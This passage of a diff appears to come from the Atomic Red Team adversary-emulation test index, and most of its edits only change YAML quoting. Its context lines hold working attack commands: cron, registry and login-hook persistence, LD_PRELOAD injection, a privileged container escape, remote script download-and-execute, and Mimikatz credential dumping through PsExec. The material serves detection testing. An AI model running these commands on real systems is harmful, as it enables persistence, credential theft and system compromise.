get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl get cronjobs -n #{namespace}
-'
+ '
name: bash
elevation_required: false
- name: CreateCronjob
@@ -13392,7 +13392,7 @@ privilege-escalation:
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -13403,20 +13403,20 @@ privilege-escalation:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
-'
+ '
cleanup_command: 'kubectl delete cronjob art -n #{namespace}
-'
+ '
name: bash
elevation_required: false
T1134.002:
@@ -13627,7 +13627,7 @@ privilege-escalation:
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
-'
+ '
supported_platforms:
- macos
- linux
@@ -13647,7 +13647,7 @@ privilege-escalation:
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
cleanup_command: 'crontab /tmp/notevil
-'
+ '
- name: Cron - Add script to all cron subfolders
auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -13655,7 +13655,7 @@ privilege-escalation:
schedule. This technique was used by the threat actor Rocke during the exploitation
of Linux web servers.
-'
+ '
supported_platforms:
- macos
- linux
@@ -13687,7 +13687,7 @@ privilege-escalation:
to execute on a schedule. This technique was used by the threat actor Rocke
during the exploitation of Linux web servers.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -13704,10 +13704,10 @@ privilege-escalation:
name: bash
command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
-'
+ '
cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}
-'
+ '
T1574.001:
technique:
object_marking_refs:
@@ -13882,10 +13882,10 @@ privilege-escalation:
dependencies:
- description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
-'
+ '
prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
@@ -13893,7 +13893,7 @@ privilege-escalation:
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
-'
+ '
name: command_prompt
T1078.001:
technique:
@@ -14013,7 +14013,7 @@ privilege-escalation:
description: 'The Adversaries can activate the default Guest user. The guest
account is inactivated by default
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -14024,10 +14024,10 @@ privilege-escalation:
executor:
command: 'net user #{guest_user} /active:yes
-'
+ '
cleanup_command: 'net user #{guest_user} /active:no
-'
+ '
name: command_prompt
elevation_required: true
T1078.002:
@@ -14300,13 +14300,13 @@ privilege-escalation:
Provider to be federated must be configured (outside of the scope of this
test).
-'
+ '
prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureADPreview -Force
-'
+ '
executor:
command: |
Import-Module AzureADPreview
@@ -14568,21 +14568,21 @@ privilege-escalation:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
-'
+ '
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-'
+ '
executor:
command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
-'
+ '
cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
-'
+ '
name: bash
elevation_required: true
- name: Shared Library Injection via LD_PRELOAD
@@ -14607,18 +14607,18 @@ privilege-escalation:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
-'
+ '
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-'
+ '
executor:
command: 'LD_PRELOAD=#{path_to_shared_library} ls
-'
+ '
name: bash
T1055.001:
technique:
@@ -14719,10 +14719,10 @@ privilege-escalation:
dependencies:
- description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
@@ -14868,7 +14868,7 @@ privilege-escalation:
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -14974,24 +14974,24 @@ privilege-escalation:
- description: Verify docker is installed.
prereq_command: 'which docker
-'
+ '
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
echo "Docker installed"; fi
-'
+ '
- description: Verify docker service is running.
prereq_command: 'sudo systemctl status docker
-'
+ '
get_prereq_command: 'sudo systemctl start docker
-'
+ '
- description: Verify kind is in the path.
prereq_command: 'which kind
-'
+ '
get_prereq_command: |
curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
chmod +x ./kind
@@ -14999,14 +14999,14 @@ privilege-escalation:
- description: Verify kind-atomic-cluster is created
prereq_command: 'sudo kind get clusters
-'
+ '
get_prereq_command: 'sudo kind create cluster --name atomic-cluster
-'
+ '
- description: Verify kubectl is in path
prereq_command: 'which kubectl
-'
+ '
get_prereq_command: |
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x ./kubectl
@@ -15017,11 +15017,11 @@ privilege-escalation:
true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin":
true,"tty":true,"securityContext":{"privileged":true}}]}}''
-'
+ '
name: sh
cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
-'
+ '
T1546:
technique:
object_marking_refs:
@@ -15565,7 +15565,7 @@ privilege-escalation:
auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8
description: 'Leverage Global Flags Settings
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -15581,19 +15581,19 @@ privilege-escalation:
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
-'
+ '
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger
/f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: IFEO Global Flags
auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1
description: 'Leverage Global Flags Settings
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -15742,7 +15742,7 @@ privilege-escalation:
description: 'This test uses the insmod command to load a kernel module for
Linux.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -15766,10 +15766,10 @@ privilege-escalation:
dependencies:
- description: 'The kernel module must exist on disk at specified location
-'
+ '
prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: |
if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{module_source_path}/* #{temp_folder}/
@@ -15778,7 +15778,7 @@ privilege-escalation:
executor:
command: 'sudo insmod #{module_path}
-'
+ '
cleanup_command: |
sudo rmmod #{module_name}
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
@@ -15990,7 +15990,7 @@ privilege-escalation:
auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900
description: 'Create a plist and execute it
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -16007,15 +16007,15 @@ privilege-escalation:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
-'
+ '
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "The shared library doesn''t exist. Check the path";
exit 1;
-'
+ '
executor:
name: bash
elevation_required: true
@@ -16113,7 +16113,7 @@ privilege-escalation:
auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
description: 'Utilize LaunchDaemon to launch `Hello World`
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -16130,15 +16130,15 @@ privilege-escalation:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
-'
+ '
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
try again."; exit 1;
-'
+ '
executor:
name: bash
elevation_required: true
@@ -16494,7 +16494,7 @@ privilege-escalation:
auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4
description: 'Mac logon script
-'
+ '
supported_platforms:
- macos
executor:
@@ -16692,7 +16692,7 @@ privilege-escalation:
description: 'Netsh interacts with other operating system components using dynamic-link
library (DLL) files
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -16703,7 +16703,7 @@ privilege-escalation:
executor:
command: 'netsh.exe add helper #{helper_file}
-'
+ '
name: command_prompt
T1037.003:
technique:
@@ -16865,10 +16865,10 @@ privilege-escalation:
dependencies:
- description: 'DLL to inject must exist on disk at specified location (#{dll_path})
-'
+ '
prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
@@ -16909,7 +16909,7 @@ privilege-escalation:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
''#{command_line}'' -ParentId #{parent_pid}'
@@ -16938,7 +16938,7 @@ privilege-escalation:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid
#{test_guid}'
@@ -16968,7 +16968,7 @@ privilege-escalation:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
@@ -17004,7 +17004,7 @@ privilege-escalation:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
-FilePath #{file_path} -CommandLine ''#{command_line}'''
@@ -17396,7 +17396,7 @@ privilege-escalation:
auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8
description: 'Modify MacOS plist file in one of two directories
-'
+ '
supported_platforms:
- macos
executor:
@@ -17497,11 +17497,11 @@ privilege-escalation:
command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART"
/v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
-'
+ '
cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
/f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1055.002:
@@ -17650,7 +17650,7 @@ privilege-escalation:
profile pofile that points to a malicious executable. Upon execution, calc.exe
will be launched.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -17666,13 +17666,13 @@ privilege-escalation:
dependencies:
- description: 'Ensure a powershell profile exists for the current user
-'
+ '
prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force
-'
+ '
executor:
command: |
Add-Content #{ps_profile} -Value ""
@@ -18020,13 +18020,13 @@ privilege-escalation:
cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
Ignore
-'
+ '
name: powershell
- name: RunPE via VBA
auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: 'This module executes notepad.exe from within the WINWORD.EXE process
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -18038,7 +18038,7 @@ privilege-escalation:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -18049,7 +18049,7 @@ privilege-escalation:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -18173,7 +18173,7 @@ privilege-escalation:
dependencies:
- description: 'The 64-bit version of Microsoft Office must be installed
-'
+ '
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
@@ -18184,7 +18184,7 @@ privilege-escalation:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -18219,7 +18219,7 @@ privilege-escalation:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -18234,10 +18234,10 @@ privilege-escalation:
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_path})
-'
+ '
prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
@@ -18248,7 +18248,7 @@ privilege-escalation:
command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa
/inject /id:500" "exit"
-'
+ '
name: command_prompt
elevation_required: false
T1055.008:
@@ -18425,14 +18425,14 @@ privilege-escalation:
command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello
World"'' >> /etc/rc.common
-'
+ '
elevation_required: true
name: bash
- name: rc.common
auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
description: 'Modify rc.common
-'
+ '
supported_platforms:
- linux
executor:
@@ -18448,12 +18448,12 @@ privilege-escalation:
];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
&& sudo rm $origfilename;fi
-'
+ '
- name: rc.local
auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
description: 'Modify rc.local
-'
+ '
supported_platforms:
- linux
executor:
@@ -18469,7 +18469,7 @@ privilege-escalation:
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
sudo rm $origfilename;fi
-'
+ '
T1547.007:
technique:
type: attack-pattern
@@ -18551,10 +18551,10 @@ privilege-escalation:
executor:
command: 'sudo defaults write com.apple.loginwindow LoginHook #{script}
-'
+ '
cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook
-'
+ '
elevation_required: true
name: sh
T1547.001:
@@ -18680,11 +18680,11 @@ privilege-escalation:
command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
"Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
-'
+ '
cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
/V "Atomic Red Team" /f >nul 2>&1
-'
+ '
name: command_prompt
- name: Reg Key RunOnce
auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb
@@ -18702,11 +18702,11 @@ privilege-escalation:
command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /d "#{thing_to_execute}"
-'
+ '
cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: PowerShell Registry RunOnce
@@ -18732,7 +18732,7 @@ privilege-escalation:
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
-Force -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Suspicious vbs file run from startup Folder
@@ -18846,7 +18846,7 @@ privilege-escalation:
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell"
-Force -ErrorAction Ignore
-'
+ '
name: powershell
T1134.005:
technique:
@@ -19011,7 +19011,7 @@ privilege-escalation:
description: 'Upon successful execution, cmd.exe will create a scheduled task
to spawn cmd.exe at 20:10.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -19028,10 +19028,10 @@ privilege-escalation:
elevation_required: false
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
-'
+ '
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
-'
+ '
- name: Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
description: |
@@ -19067,11 +19067,11 @@ privilege-escalation:
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
-'
+ '
cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
/TN "Atomic task" /F >nul 2>&1
-'
+ '
- name: Powershell Cmdlet Scheduled Task
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
description: |
@@ -19093,7 +19093,7 @@ privilege-escalation:
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
-'
+ '
- name: Task Scheduler via VBA
auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
description: |
@@ -19110,7 +19110,7 @@ privilege-escalation:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -19121,7 +19121,7 @@ privilege-escalation:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -19134,7 +19134,7 @@ privilege-escalation:
login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
as Register-ScheduledTask cmdlet behind the scenes.
-'
+ '
supported_platforms:
- windows
executor:
@@ -19146,7 +19146,7 @@ privilege-escalation:
cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
>$null 2>&1
-'
+ '
- name: Scheduled Task Executing Base64 Encoded Commands From Registry
auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
description: "A Base64 Encoded command will be stored in the registry (ping
@@ -19304,7 +19304,7 @@ privilege-escalation:
sets it as the screensaver so it will execute for persistence. Requires a
reboot and logon.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -19566,7 +19566,7 @@ privilege-escalation:
description: 'Change Service registry ImagePath of a bengin service to a malicious
file
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -19586,22 +19586,22 @@ privilege-escalation:
dependencies:
- description: 'The service must exist (#{weak_service_name})
-'
+ '
prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
-'
+ '
executor:
command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
/f /v ImagePath /d "#{malicious_service_path}"
-'
+ '
cleanup_command: 'sc.exe delete #{weak_service_name}
-'
+ '
name: command_prompt
T1548.001:
technique:
@@ -19657,7 +19657,7 @@ privilege-escalation:
description: 'Make, change owner, and change file attributes on a C source code
file
-'
+ '
supported_platforms:
- macos
- linux
@@ -19683,7 +19683,7 @@ privilege-escalation:
auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
description: 'This test sets the SetUID flag on a file in Linux and macOS.
-'
+ '
supported_platforms:
- macos
- linux
@@ -19699,14 +19699,14 @@ privilege-escalation:
sudo chmod u+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
-'
+ '
name: sh
elevation_required: true
- name: Set a SetGID flag on file
auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
description: 'This test sets the SetGID flag on a file in Linux and macOS.
-'
+ '
supported_platforms:
- macos
- linux
@@ -19722,7 +19722,7 @@ privilege-escalation:
sudo chmod g+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
-'
+ '
name: sh
elevation_required: true
- name: Make and modify capabilities of a binary
@@ -19754,7 +19754,7 @@ privilege-escalation:
description: 'This test gives a file the capability to set UID without using
flags.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -19768,7 +19768,7 @@ privilege-escalation:
sudo setcap cap_setuid=ep #{file_to_setcap}
cleanup_command: 'rm #{file_to_setcap}
-'
+ '
name: sh
elevation_required: true
T1547.009:
@@ -19842,7 +19842,7 @@ privilege-escalation:
#{shortcut_file_path}
cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1
-'
+ '
name: command_prompt
- name: Create shortcut to cmd in startup folders
auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2
@@ -19943,10 +19943,10 @@ privilege-escalation:
executor:
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
-'
+ '
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
-'
+ '
name: sh
elevation_required: true
T1548.003:
@@ -20014,7 +20014,7 @@ privilege-escalation:
auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e
description: 'Common Sudo enumeration methods.
-'
+ '
supported_platforms:
- macos
- linux
@@ -20028,7 +20028,7 @@ privilege-escalation:
This is dangerous to modify without using ''visudo'', do not do this on a
production system.
-'
+ '
supported_platforms:
- macos
- linux
@@ -20043,7 +20043,7 @@ privilege-escalation:
description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
to modify without using ''visudo'', do not do this on a production system.
-'
+ '
supported_platforms:
- macos
- linux
@@ -20149,7 +20149,7 @@ privilege-escalation:
description: 'This test creates a Systemd service unit file and enables it as
a service.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -20222,15 +20222,15 @@ privilege-escalation:
dependencies:
- description: 'System must be Ubuntu ,Kali OR CentOS.
-'
+ '
prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
/etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
-'
+ '
get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
-'
+ '
executor:
name: bash
elevation_required: true
@@ -20387,20 +20387,20 @@ privilege-escalation:
dependencies:
- description: 'Check if systemd-run exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
-'
+ '
executor:
elevation_required: false
command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1''
/bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log''
-'
+ '
cleanup_command: |
systemctl --user stop Atomic-Red-Team.service
systemctl --user stop Atomic-Red-Team.timer
@@ -20417,20 +20417,20 @@ privilege-escalation:
dependencies:
- description: 'Check if systemd-run exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
-'
+ '
executor:
elevation_required: true
command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh
-c ''echo "$(date) $(whoami)" >>/tmp/log''
-'
+ '
cleanup_command: |
systemctl stop Atomic-Red-Team.service
systemctl stop Atomic-Red-Team.timer
@@ -20909,7 +20909,7 @@ privilege-escalation:
auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f
description: 'Adds a command to the .bash_profile file of the current user
-'
+ '
supported_platforms:
- macos
- linux
@@ -20921,16 +20921,16 @@ privilege-escalation:
executor:
command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
-'
+ '
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bash_profile
-'
+ '
name: sh
- name: Add command to .bashrc
auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
description: 'Adds a command to the .bashrc file of the current user
-'
+ '
supported_platforms:
- macos
- linux
@@ -20942,10 +20942,10 @@ privilege-escalation:
executor:
command: 'echo ''#{command_to_add}'' >> ~/.bashrc
-'
+ '
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bashrc
-'
+ '
name: sh
T1055.014:
technique:
@@ -21382,10 +21382,10 @@ privilege-escalation:
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
-'
+ '
prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -21418,10 +21418,10 @@ privilege-escalation:
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
-'
+ '
prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -21547,11 +21547,11 @@ privilege-escalation:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Shell" "explorer.exe, #{binary_to_execute}" -Force
-'
+ '
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Winlogon Userinit Key Persistence - PowerShell
auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
@@ -21570,11 +21570,11 @@ privilege-escalation:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Userinit" "Userinit.exe, #{binary_to_execute}" -Force
-'
+ '
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Winlogon Notify Key Logon Persistence - PowerShell
auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9
@@ -21596,7 +21596,7 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
-Force -ErrorAction Ignore
-'
+ '
name: powershell
T1547.013:
technique:
@@ -22091,10 +22091,10 @@ defense-evasion:
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
#{local_file}
-'
+ '
cleanup_command: 'del #{local_file} >nul 2>&1
-'
+ '
name: command_prompt
- name: Bitsadmin Download (PowerShell)
auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
@@ -22118,10 +22118,10 @@ defense-evasion:
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
#{local_file}
-'
+ '
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
-'
+ '
name: powershell
- name: Persist, Download, & Execute
auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
@@ -22159,7 +22159,7 @@ defense-evasion:
bitsadmin.exe /complete #{bits_job_name}
cleanup_command: 'del #{local_file} >nul 2>&1
-'
+ '
name: command_prompt
- name: Bits download using desktopimgdownldr.exe (cmd)
auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
@@ -22191,10 +22191,10 @@ defense-evasion:
command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
/eventName:desktopimgdownldr
-'
+ '
cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1
-'
+ '
name: command_prompt
T1027.001:
technique:
